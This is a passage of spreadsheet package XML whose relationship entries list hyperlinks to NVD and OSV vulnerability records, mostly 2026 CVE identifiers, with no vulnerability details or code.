Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102097" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102098" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102099" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102108" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102114" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102116" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102117" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102119" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102129" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102130" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102131" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102132" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102142" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102150" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102392" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103441" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103442" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79625" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85679" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93624" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93651" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93771" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94122" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94677" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96343" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96344" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96561" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96815" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96832" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96833" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97245" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97256" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97347" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100507" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100510" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102109" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102376" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102385" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102391" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102395" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102396" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102398" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102456" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102457" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103242" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27371" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47554" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47602" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78210" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92869" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93512" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93514" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93770" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94078" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94081" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94171" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94499" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96351" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96352" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96814" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96816" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96819" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96820" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96830" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96836" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97065" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97077" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97235" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97237" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97250" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97253" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97271" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97272" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97289" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97290" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102127" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47582" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47596" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47598" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93495" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101896" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101898" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101901" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101903" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101905" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101906" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101907" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101909" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101916" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76169" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84428" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84469" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84504" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87817" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87819" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90776" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91776" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91777" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-9c5c-9qcx-q35q" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-c2m8-h5v5-343r" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-chx6-46f5-w4vp" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-vcvr-r3jv-pc5j" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94952" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100758" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103056" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54400" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103040" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103041" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101894" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102268" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79536" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79537" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97689" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67993" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71971" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74220" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74221" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94953" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94954" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95362" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100700" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102253" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103043" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61519" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102911" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102794" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102875" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79403" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100702" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100756" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95301" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95344" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95376" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102930" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97687" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100241" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100244" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102276" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102278" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102281" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102728" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102758" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54873" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102266" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102267" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102271" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102272" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102273" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100288" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103054" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74225" TargetMode="External" Id="rId417" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet8.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76504" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102427" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55107" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100512" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55494" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97248" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102149" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55181" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103475" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74864" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102508" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102992" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19445" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74865" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102095" TargetMode="External" Id="rId15" /><Relationship 